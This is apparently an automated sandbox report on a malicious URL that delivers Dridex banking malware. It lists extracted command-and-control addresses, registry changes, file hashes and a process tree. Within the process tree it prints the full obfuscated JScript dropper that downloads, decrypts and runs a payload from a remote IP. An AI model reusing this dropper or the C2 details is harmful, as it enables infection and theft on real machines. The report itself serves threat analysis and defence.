Overview
overview
10Static
static
URLScan
urlscan
https://ankltraffice...
windows7_x64
6https://ankltraffice...
windows7_x64
1https://ankltraffice...
windows7_x64
1https://ankltraffice...
windows7_x64
1https://ankltraffice...
windows10_x64
10https://ankltraffice...
windows10_x64
10https://ankltraffice...
windows10_x64
10https://ankltraffice...
windows10_x64
10https://ankltraffice...
windows10_x64
Analysis
-
max time kernel
131s -
max time network
154s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
10-09-2021 00:52
Static task
static1
URLScan task
urlscan1
Sample
https://ankltrafficexit.xyz/trafficexit
Behavioral task
behavioral1
Sample
https://ankltrafficexit.xyz/trafficexit
Resource
win7-jp
Behavioral task
behavioral2
Sample
https://ankltrafficexit.xyz/trafficexit
Resource
win7-fr
Behavioral task
behavioral3
Sample
https://ankltrafficexit.xyz/trafficexit
Resource
win7v20210408
Behavioral task
behavioral4
Sample
https://ankltrafficexit.xyz/trafficexit
Resource
win7-de
Behavioral task
behavioral5
Sample
https://ankltrafficexit.xyz/trafficexit
Resource
win10v20210408
Behavioral task
behavioral6
Sample
https://ankltrafficexit.xyz/trafficexit
Resource
win10-jp
Behavioral task
behavioral7
Sample
https://ankltrafficexit.xyz/trafficexit
Resource
win10-fr
Behavioral task
behavioral8
Sample
https://ankltrafficexit.xyz/trafficexit
Resource
win10-en
Behavioral task
behavioral9
Sample
https://ankltrafficexit.xyz/trafficexit
Resource
win10-de
General
Malware Config
Extracted
dridex
10111
104.152.111.198:9676
92.247.29.75:10172
133.242.136.130:8194
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
wscript.exeflow pid process 25 2844 wscript.exe -
Executes dropped EXE 1 IoCs
Processes:
xkrzk.exepid process 3940 xkrzk.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
xkrzk.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA xkrzk.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
iexplore.exeIEXPLORE.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{A951F9BF-11E1-11EC-B2DB-E6C57AC66A15} = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2121473975" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\FlipAhead iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$vBulletin 4 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$WordPress iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$http://www.typepad.com/ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "338007123" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30909934" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\FlipAhead\FileVersion = "2016061511" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$Telligent iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$Discuz! iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$MediaWiki iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$vBulletin 3 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\FlipAhead\NextUpdateDate = "338055709" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2121473975" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30909934" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2156475484" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate\NextUpdateDate = "338023717" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30909934" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$blogger iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
iexplore.exepid process 664 iexplore.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
iexplore.exepid process 664 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
iexplore.exeIEXPLORE.EXEpid process 664 iexplore.exe 664 iexplore.exe 3948 IEXPLORE.EXE 3948 IEXPLORE.EXE 3948 IEXPLORE.EXE 3948 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
iexplore.exeIEXPLORE.EXEcmd.exewscript.exedescription pid process target process PID 664 wrote to memory of 3948 664 iexplore.exe IEXPLORE.EXE PID 664 wrote to memory of 3948 664 iexplore.exe IEXPLORE.EXE PID 664 wrote to memory of 3948 664 iexplore.exe IEXPLORE.EXE PID 3948 wrote to memory of 712 3948 IEXPLORE.EXE cmd.exe PID 3948 wrote to memory of 712 3948 IEXPLORE.EXE cmd.exe PID 3948 wrote to memory of 712 3948 IEXPLORE.EXE cmd.exe PID 712 wrote to memory of 2844 712 cmd.exe wscript.exe PID 712 wrote to memory of 2844 712 cmd.exe wscript.exe PID 712 wrote to memory of 2844 712 cmd.exe wscript.exe PID 2844 wrote to memory of 3476 2844 wscript.exe cmd.exe PID 2844 wrote to memory of 3476 2844 wscript.exe cmd.exe PID 2844 wrote to memory of 3476 2844 wscript.exe cmd.exe
Processes
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://ankltrafficexit.xyz/trafficexit1⤵
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:664 CREDAT:82945 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "hX1ZytEytd" "http://31.44.3.102/?NTk1NzM2&JGsABzK&fhfghddfsdf=twix&dsfdffg43t=TKNbP0fOH0eD2MjN2LHTRcHsLlni0urBDV2rtl7yQ1mH9PoufLZQO1fijE2Fc1AznI0PUF5H8K6si0WBwUXNgp_R-CWPYAh1otKWJA&ogfgafgn4=wH3QMvXcJwDMFYPJKeXD&sdfsdfdfg=why&cxssdvxcv=109hbobs.102fq101.406y2p1j0&IHTvMTk4NjI=" "2""3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\wscript.exewsCripT //B //E:JScript 3.tMp "hX1ZytEytd" "http://31.44.3.102/?NTk1NzM2&JGsABzK&fhfghddfsdf=twix&dsfdffg43t=TKNbP0fOH0eD2MjN2LHTRcHsLlni0urBDV2rtl7yQ1mH9PoufLZQO1fijE2Fc1AznI0PUF5H8K6si0WBwUXNgp_R-CWPYAh1otKWJA&ogfgafgn4=wH3QMvXcJwDMFYPJKeXD&sdfsdfdfg=why&cxssdvxcv=109hbobs.102fq101.406y2p1j0&IHTvMTk4NjI=" "2""4⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c xkrzk.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\xkrzk.exexkrzk.exe6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776MD5
f330f5c2ae65a5afe1a96d38e55ac8fc
SHA19432e52f3eda1c41fe8812cc010ff8702e2e4b7e
SHA25631503cf9dda5cbac641697611050e3e74fa6db6e6eb6d2e5260d532801423d42
SHA51259a55559cb54384ba57730e326253baf636a067d1c12285496db0b7f2f265feb9ca2ef92ac50611878c1e13acf1320c8016f323132ab1a04fb46c915ca761dbf
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776MD5
0ee4330b303531893fd7e8759caba6ef
SHA1943fb59aa8214852114cf6f06c195601b2faf0fe
SHA256e1168b49cbe12d54d5b38fe6cd64f7cff690a21e043f7c390bf5ecc9232f5a41
SHA512d7aa1f24d3d41be85ffe77a4e6d4f018ef0a324fa97863428b96a337426bde61a79dc38c98ae657ea1ee9b8f43329d6abd2893ce98763565bef32a2cbf86695b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\B86Z2F34.cookieMD5
303a209c2556ead5715a4ac47d01c9f7
SHA11bb6cb12dab0a2862305e9ff2192ce2fd86027f9
SHA2567b328e8336b8faac0303b2d9ec7d00df656f17c49fde9c0b01acdaa7bd78f134
SHA5122a1aacb58dd74138085db474ef28d8e90411c68cf81ef6de8453b184cc57cfd125f418a04a2c846374028cd859964fb51f502faf0a97c774db55abfabe729ed7
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\G0C79W80.cookieMD5
edcf494e59adcd3dbe3635d814ae9f4c
SHA10df62e7621cb0e6c8a024a8aad40eb84a25d900c
SHA25654e120a864a3152a4239f6fcd9683fea4a9e7d1d17c77d2c86ab60b74e18dcfd
SHA5128ca6758e0c45ba4516decc4a289473c656b0a4006dad3387c165e775c1a30d9a7fb8726a4ed7c88b81b3add9166ff0c3d7d359a3bdd65a508cb5367b35ca14fc
-
C:\Users\Admin\AppData\Local\Temp\3.tMpMD5
60fc00422b399db85f87d41b8328976d
SHA1bb85034acad8025f97e5bb236443debaf8926e4b
SHA256c38eb3965155b143c8d72bf219ec6dd985a106ce0776c272470b0019e74fb690
SHA51216fa1a3c187500b5c3867fa05752428496273b73c2960c54d2e34e4833a057392c1f5469c8824fdc3d29c9ece2e65189ee281638ccaae941437a259192591151
-
C:\Users\Admin\AppData\Local\Temp\xkrzk.exeMD5
223dc24b1075564c200030321e21ee09
SHA176fdfb19ae4f9de19f5c039c16fd519a5f96027f
SHA2569ba5eb35f3869aaba5be3c0dc7bc64ff2de408c3679c13f0b84733da0a78a280
SHA51229f073141709ff88d050282ebffd1d6ad9278068ff78e37537b26e88063664f7d6652abcd15666e3d53d8ef2ef9fb75b59eae0febc1f760a5e73aae3e71c9277
-
C:\Users\Admin\AppData\Local\Temp\xkrzk.exeMD5
223dc24b1075564c200030321e21ee09
SHA176fdfb19ae4f9de19f5c039c16fd519a5f96027f
SHA2569ba5eb35f3869aaba5be3c0dc7bc64ff2de408c3679c13f0b84733da0a78a280
SHA51229f073141709ff88d050282ebffd1d6ad9278068ff78e37537b26e88063664f7d6652abcd15666e3d53d8ef2ef9fb75b59eae0febc1f760a5e73aae3e71c9277
-
memory/664-114-0x00007FFAE0360000-0x00007FFAE03CB000-memory.dmpFilesize
428KB
-
memory/712-116-0x0000000000000000-mapping.dmp
-
memory/2844-117-0x0000000000000000-mapping.dmp
-
memory/3476-119-0x0000000000000000-mapping.dmp
-
memory/3940-122-0x0000000002280000-0x00000000022BC000-memory.dmpFilesize
240KB
-
memory/3940-123-0x0000000000400000-0x000000000051A000-memory.dmpFilesize
1.1MB
-
memory/3948-115-0x0000000000000000-mapping.dmp